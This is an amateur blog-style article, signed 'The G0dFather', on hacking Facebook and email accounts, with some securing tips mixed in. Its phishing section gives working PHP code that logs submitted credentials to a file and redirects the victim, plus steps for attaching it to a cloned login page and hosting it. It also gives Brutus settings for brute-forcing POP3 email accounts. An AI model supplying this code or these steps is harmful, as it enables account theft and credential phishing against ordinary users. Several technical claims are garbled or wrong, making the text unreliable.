Facebook and email account hacking and how to secure it:
These ways can be used against both email accounts and facebook accounts
First I am going to talk about some types of attacks hacker’s use to hack in to our facebook accounts lets start:
Session Hijacking:
What Is Session Hi Jacking.
Well the hacker use’s session hijacking to capture your cookies of course there are a lot of tools out here that can help a hacker capture these cookies so when these cookies are captured the hacker first will know what have you been browsing your login credentials and a lot more all of us want to now how to protect our self from this type of attack first thing we should do is activate https and forget about http
What is http and https:
HTTP (Hiper Text Transfer Protocol.)
HTTPS (Hiper Text Transfer Protocol Secure.)
Ok http run’s on the port 80 as we all now and the https run’s on a more secure port its on port 443
What is the difference between both of these the http is not secure https is more secure then it 10 times.
Ok lets start talking practically this is the exciting part:
There is this good guy and there is this bad guy.
The bad guy first talks to the good guy they started the conversation the bad guy said to the good guy I have to go
So the good guy was using port 80 in this example.
So the bad guy does a scan and he captured his cookies so after capturing the cookies the bad guy got the login credentials browsing history etc….
Now the good guy switched to https so the bad guy try’s to capture the cookies once again after some minutes the bad guy couldn’t capture any cookies.
Ok how should we protect our facebook accounts from getting hacked or compromised:
First thing you will have to do is go and click on account click on account settings on the right you will find something called Security click on it and then you will see
Secure Browsing is currently disabled click on that and check mark on Browse facebook on a secure connection (https) when possible.
And I would recommend using login approvals and putting a recognized devices its helpful and more secure for you guy’s.
I recommend hiding your email address by going to your profile clicking on edit my profile and clicking on contact information you will find in it Emails you will find the email you login with and on its left you will find something called friends, friends of friends, public and only me you would want to click on the only me And I prefer hiding your phone number.
Phishing:
This method can be used against email accounts and facebook accounts so now we will try to make this short because new browser’s can detect this type of attack some times so lets start
Phishing Is the (Fake Login Page) so lets say the hacker sent you a link you opened this link and it opened in a new tab or a new window and you previously logged in to your facebook account it will tell you that you need to login again so you say this is weird I have logged In before so you said oh well let me put my password so when you put your Username/password then your email/facebook account got hacked so if you think for a little while you will realize that this is a fake page a hacker is trying to trick you in to putting your credentials (User Name & Password) in it so your credentials got hacked and they get saved in a text file called password so how does the hacker do this he gets a the pages source code now open notepad and change the http://www.redirectwebsite.com to the address you want him to redirect after entering there user name and password
After typing the website you want to redirect them to lets say save it as hello.php.
Of course copy this code:
1: <?php
2: header ('Location: http://www.redirectwebsite.com');
3: $handle = fopen("pass.txt", "a");
4: foreach($_POST as $variable => $value) {
5: fwrite($handle, $variable);
6: fwrite($handle, "=");
7: fwrite($handle, $value);
8: fwrite($handle, "rn");
9: }
10: fwrite($handle, "rn");
11: fclose($handle);
12: exit;
13: ?>
And now we will have to create an empty file and save it is as password.txt now open the the source code and find the action tag and replace the address with hi.php and save the file
Now we have created the three files we will be needing now we will have to upload it to a free host after uploading open the html file and enter fake credentials and go check the password.txt
If you see the user name and password it mean’s that everything is done.
FireSheep:
This is a firefox extension the hacker uses so if your using a non protected wireless the hacker can easily hack your account.
Brute Forcing The Email Address:
Today your gonna be hearing of the brute force attack the hacker use’s so you have saw every one of you searched for something called facebook/email hacking/cracking tools and you found some but of course most of them are fake lets start with this tool called brutus this tool can brute force or do a dictionary attack on an email address so this tool can be very helpful so the only thing you have to do is type in target pop3.yahoo.com lets say and in the type put it on pop3 now you will have to put connection on 10 and the time out on 60 then make a wordlist.txt and type in the email that you want to hack and now in pass mode put it brute force.
There is a tool called pop3 email password finder so this is a tool that can brute force accounts it’s a good tool well by the way both of these tools I have tried on windows xp they work and there very good.
Java Script:
This one I have done with my own hands this java script when you insert in of course on the rest password page you will find an alternative email you will put the java script and click enter you can now put any email address the rest link will be sent to your email.
Keylogger’s:
The hacker uses the keylogger to record your keyboard strokes every key you type will be recorded and sent to the hacker now the hacker has to send a file the keylogger must be inside so the hacker can hide the file in to any thing he wants even to a music file a picture anything so when you open this file or it will put an error or it will be open and you wont see anything open so now when you sign in the hacker can see your credentials (User Name & Password) what will it appear like when you restart your computer a .bat file will appear and it will start automatically every time you restart or turn on your computer so how can we remove this.
If it did not appear in .bat it will be silently in the processor’s so we will have to disable it by pressing ALT+ CTRL+ Delete and clicking on processors then finding the name of the file.
Ok for more security on hotmail try using a code to sign in and don’t put alternative email address’s put sign me in with my trusted pc.
On yahoo you will need to provide 2 fake answer’s that will make you a lot secure.
On gmail the same as these.
I hope you enjoy this article there are more methods to use see you in my next article.
By
Fadi Rakha
The G0dFather
